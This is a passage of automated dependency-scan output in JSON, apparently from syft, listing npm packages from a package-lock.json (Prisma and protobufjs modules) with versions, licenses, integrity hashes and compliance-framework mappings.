"cpe:2.3:a:\\@prisma\\/engines-version:\\@prisma\\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@prisma\\/engines_version:\\@prisma\\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@prisma\\/engines_version:\\@prisma\\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@prisma\\/engines:\\@prisma\\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@prisma\\/engines:\\@prisma\\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@prisma/engines-version/-/engines-version-5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2.tgz", "integrity": "sha512-2PTmxFR2yHW/eB3uqWtcgRcgAbG1rwG9ZriSvQw+nnb7c4uCr3RAcGMb6/zfE88SKlC1Nj2ziUvc96Z379mHgQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "17f0b8bb58a0d4a7", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @prisma/fetch-engine 5.22.0", "title": "@prisma/fetch-engine 5.22.0", "description": "Package discovered: @prisma/fetch-engine 5.22.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "373747b9463a5333", "name": "@prisma/fetch-engine", "version": "5.22.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@prisma\\/fetch-engine:\\@prisma\\/fetch-engine:5.22.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@prisma\\/fetch-engine:\\@prisma\\/fetch_engine:5.22.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@prisma\\/fetch_engine:\\@prisma\\/fetch-engine:5.22.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@prisma\\/fetch_engine:\\@prisma\\/fetch_engine:5.22.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@prisma\\/fetch:\\@prisma\\/fetch-engine:5.22.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@prisma\\/fetch:\\@prisma\\/fetch_engine:5.22.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40prisma/fetch-engine@5.22.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@prisma/fetch-engine/-/fetch-engine-5.22.0.tgz", "integrity": "sha512-bkrD/Mc2fSvkQBV5EpoFcZ87AvOgDxbG99488a5cexp5Ccny+UM6MAe/UFkUC0wLYD9+9befNOqGiIJhhq+HbA==", "dependencies": { "@prisma/debug": "5.22.0", "@prisma/engines-version": "5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", "@prisma/get-platform": "5.22.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d7f7c5d00389674a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @prisma/get-platform 5.22.0", "title": "@prisma/get-platform 5.22.0", "description": "Package discovered: @prisma/get-platform 5.22.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "35191eb100a1fadc", "name": "@prisma/get-platform", "version": "5.22.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@prisma\\/get-platform:\\@prisma\\/get-platform:5.22.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@prisma\\/get-platform:\\@prisma\\/get_platform:5.22.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@prisma\\/get_platform:\\@prisma\\/get-platform:5.22.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@prisma\\/get_platform:\\@prisma\\/get_platform:5.22.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@prisma\\/get:\\@prisma\\/get-platform:5.22.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@prisma\\/get:\\@prisma\\/get_platform:5.22.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40prisma/get-platform@5.22.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@prisma/get-platform/-/get-platform-5.22.0.tgz", "integrity": "sha512-pHhpQdr1UPFpt+zFfnPazhulaZYCUqeIcPpJViYoq9R+D/yw4fjE+CtnsnKzPYm0ddUbeXUzjGVGIRVgPDCk4Q==", "dependencies": { "@prisma/debug": "5.22.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "e931437e79a085b9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @protobufjs/aspromise 1.1.2", "title": "@protobufjs/aspromise 1.1.2", "description": "Package discovered: @protobufjs/aspromise 1.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "503ecf3ae2d5a446", "name": "@protobufjs/aspromise", "version": "1.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@protobufjs\\/aspromise:\\@protobufjs\\/aspromise:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40protobufjs/aspromise@1.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@protobufjs/aspromise/-/aspromise-1.1.2.tgz", "integrity": "sha512-j+gKExEuLmKwvz3OgROXtrJ2UG2x8Ch2YZUxahh+s1F2HZ+wAceUNLkvy6zKCPVRkU++ZWQrdxsUeQXmcg4uoQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "e4bf388f995dc845", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @protobufjs/base64 1.1.2", "title": "@protobufjs/base64 1.1.2", "description": "Package discovered: @protobufjs/base64 1.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "493d13966d12b3a0", "name": "@protobufjs/base64", "version": "1.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@protobufjs\\/base64:\\@protobufjs\\/base64:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40protobufjs/base64@1.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@protobufjs/base64/-/base64-1.1.2.tgz", "integrity": "sha512-AZkcAA5vnN/v4PDqKyMR5lx7hZttPDgClv83E//FMNhR2TMcLUhfRUBHCmSl0oi9zMgDDqRUJkSxO3wm85+XLg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "fad1d6a5684086d4", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @protobufjs/codegen 2.0.5", "title": "@protobufjs/codegen 2.0.5", "description": "Package discovered: @protobufjs/codegen 2.0.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "12a6d95fe5a62fc1", "name": "@protobufjs/codegen", "version": "2.0.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@protobufjs\\/codegen:\\@protobufjs\\/codegen:2.0.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40protobufjs/codegen@2.0.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@protobufjs/codegen/-/codegen-2.0.5.tgz", "integrity": "sha512-zgXFLzW3Ap33e6d0Wlj4MGIm6Ce8O89n/apUaGNB/jx+hw+ruWEp7EwGUshdLKVRCxZW12fp9r40E1mQrf/34g==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "efbb149e9a326e2c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @protobufjs/eventemitter 1.1.0", "title": "@protobufjs/eventemitter 1.1.0", "description": "Package discovered: @protobufjs/eventemitter 1.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7097fcb2aeb00411", "name": "@protobufjs/eventemitter", "version": "1.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@protobufjs\\/eventemitter:\\@protobufjs\\/eventemitter:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40protobufjs/eventemitter@1.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@protobufjs/eventemitter/-/eventemitter-1.1.0.tgz", "integrity": "sha512-j9ednRT81vYJ9OfVuXG6ERSTdEL1xVsNgqpkxMsbIabzSo3goCjDIveeGv5d03om39ML71RdmrGNjG5SReBP/Q==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "817b2c8a979dff10", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @protobufjs/fetch 1.1.0", "title": "@protobufjs/fetch 1.1.0", "description": "Package discovered: @protobufjs/fetch 1.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "4ed2c80c8ad8c116", "name": "@protobufjs/fetch", "version": "1.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@protobufjs\\/fetch:\\@protobufjs\\/fetch:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40protobufjs/fetch@1.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@protobufjs/fetch/-/fetch-1.1.0.tgz", "integrity": "sha512-lljVXpqXebpsijW71PZaCYeIcE5on1w5DlQy5WH6GLbFryLUrBD4932W/E2BSpfRJWseIL4v/KPgBFxDOIdKpQ==", "dependencies": { "@protobufjs/aspromise": "^1.1.1", "@protobufjs/inquire": "^1.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "253d6aca6c381638", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @protobufjs/float 1.0.2", "title": "@protobufjs/float 1.0.2", "description": "Package discovered: @protobufjs/float 1.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "dda6f1aef9d11e58", "name": "@protobufjs/float", "version": "1.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@protobufjs\\/float:\\@protobufjs\\/float:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40protobufjs/float@1.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@protobufjs/float/-/float-1.0.2.tgz", "integrity": "sha512-Ddb+kVXlXst9d+R9PfTIxh1EdNkgoRe5tOX6t01f1lYWOvJnSPDBlG241QLzcyPdoNTsblLUdujGSE4RzrTZGQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7699234b047c9f55", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @protobufjs/inquire 1.1.1", "title": "@protobufjs/inquire 1.1.1", "description": "Package discovered: @protobufjs/inquire 1.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a8f805afd5f928e8", "name": "@protobufjs/inquire", "version": "1.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@protobufjs\\/inquire:\\@protobufjs\\/inquire:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40protobufjs/inquire@1.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@protobufjs/inquire/-/inquire-1.1.1.tgz", "integrity": 